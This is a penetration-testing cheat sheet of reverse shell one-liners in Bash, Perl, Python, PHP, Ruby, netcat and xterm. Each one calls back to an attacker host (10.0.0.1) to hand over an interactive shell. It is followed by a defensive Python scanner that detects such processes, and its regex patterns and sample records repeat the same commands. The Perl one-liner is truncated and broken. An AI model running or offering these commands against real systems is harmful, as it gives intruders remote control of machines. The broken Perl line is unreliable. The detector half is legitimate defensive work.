Level: this article is aimed at people with a high level of technical skill.
Sometimes during a penetration test you forget the useful commands that let you take control of a machine without adding a new user to the system. The idea is to get into the system by starting the connection from inside the target machine out to your own; this is called a "reverse connection". If you attach a shell binary to that reverse connection, you obtain a "reverse shell".
The rules of engagement established before the penetration test starts say: you can't add a new account, SSH key or .rhosts file. That leaves you with a reverse shell. At this point, the following cheat sheet is going to be very useful in your future penetration tests.

Bash
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

PERL
Here's a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;
There's also an alternative PERL reverse shell here.

Python
This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP
This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn't work, try 4, 5, 6...
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat
Netcat is rarely present on production systems, and even if it is, there are several versions of netcat, some of which don't support the -e option.
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1
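Every one-liner above ends the same way on the target: an interactive shell whose standard input, output and error have been redirected onto a network socket. The following is an added, defender-side example and not part of the original cheat sheet: a small Python scanner that flags processes matching either that descriptor pattern or the command-line fragments of the variants listed above. The process records in it are constructed for the example; `collect_from_proc()` gathers the same fields from a live Linux `/proc`. The function, class and pattern names are my own, not from any tool.

```python
"""Detect reverse-shell-style processes from their command line or their stdio.

Two heuristics drawn from the one-liners on the cheat sheet:
 1. command lines containing tell-tale fragments (/dev/tcp/, nc -e, mkfifo|nc,
    dup2(...fileno()), fsockopen+exec, xterm -display <remote host>);
 2. a shell whose fds 0, 1 and 2 are all sockets, which is what every variant
    produces regardless of how the command was spelled.
"""
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Shell binaries whose stdio should normally be a tty or a pipe, never a socket.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

# (label, regex) pairs; one per cheat-sheet variant.
CMDLINE_PATTERNS = [
    ("bash /dev/tcp redirection", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("netcat -e shell", re.compile(r"\bnc(?:at)?\b.*\s-e\s+\S*sh\b")),
    ("mkfifo pipe to netcat", re.compile(r"mkfifo\b.*\|\s*(?:nc|ncat)\b")),
    ("socket dup2 onto stdio", re.compile(r"dup2\(.*fileno\(\)")),
    ("fsockopen with exec", re.compile(r"fsockopen\(.*exec\(")),
    ("xterm to remote display", re.compile(r"\bxterm\b.*-display\s+(?!:)\S+:\d+")),
]


@dataclass
class Proc:
    pid: int
    comm: str                      # executable name, as in /proc/<pid>/comm
    cmdline: str                   # full command line, NUL bytes replaced by spaces
    fds: Dict[int, str] = field(default_factory=dict)  # fd number -> readlink target


def is_socket_backed_shell(p: Proc) -> bool:
    """True for a shell whose stdin, stdout and stderr are all sockets."""
    if p.comm not in SHELLS:
        return False
    return all(p.fds.get(n, "").startswith("socket:") for n in (0, 1, 2))


def match_cmdline(p: Proc) -> List[str]:
    """Labels of every command-line pattern that matches this process."""
    return [label for label, rx in CMDLINE_PATTERNS if rx.search(p.cmdline)]


def find_reverse_shells(procs) -> List[Tuple[int, str, List[str]]]:
    """Return (pid, comm, reasons) for each process that trips a heuristic."""
    findings = []
    for p in procs:
        reasons = match_cmdline(p)
        if is_socket_backed_shell(p):
            reasons.append("shell with socket-backed stdin/stdout/stderr")
        if reasons:
            findings.append((p.pid, p.comm, reasons))
    return findings


def collect_from_proc() -> List[Proc]:
    """Read live process data from /proc (Linux only; unreadable pids are skipped)."""
    procs = []
    for pid in (d for d in os.listdir("/proc") if d.isdigit()):
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            fds = {}
            for n in (0, 1, 2):
                try:
                    fds[n] = os.readlink(f"/proc/{pid}/fd/{n}")
                except OSError:
                    pass  # fd closed or not readable at this privilege level
        except OSError:
            continue
        procs.append(Proc(int(pid), comm, cmdline, fds))
    return procs


# Constructed sample data (not captured from a real host): two benign shells on a
# pty, records shaped like the cheat-sheet one-liners, and a bare "sh -i" whose
# stdio has already been dup'ed onto a socket.
PTS = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}
SOCK = {0: "socket:[31337]", 1: "socket:[31337]", 2: "socket:[31337]"}
SAMPLE_PROCS = [
    Proc(101, "bash", "-bash", PTS),
    Proc(201, "bash", "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1", SOCK),
    Proc(202, "nc", "nc -e /bin/sh 10.0.0.1 1234", PTS),
    Proc(203, "sh", "sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f", PTS),
    Proc(204, "xterm", "xterm -display 10.0.0.1:1", PTS),
    Proc(205, "sh", "/bin/sh -i", SOCK),
    Proc(206, "bash", "bash -c ls -l", PTS),
    Proc(207, "php", 'php -r $sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");', PTS),
    Proc(208, "python", "python -c import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0)", PTS),
]

if __name__ == "__main__":
    for pid, comm, reasons in find_reverse_shells(SAMPLE_PROCS):
        print(pid, comm, "; ".join(reasons))
```

Run it as `python3 scanner.py` to list the sample findings; on a Linux host, replace `SAMPLE_PROCS` with `collect_from_proc()` (root is needed to read other users' fd links). The descriptor check is the more robust of the two heuristics because it does not depend on how the command was spelled, but a shell started by a socket-activated service will also trip it, so treat hits as leads for triage rather than verdicts.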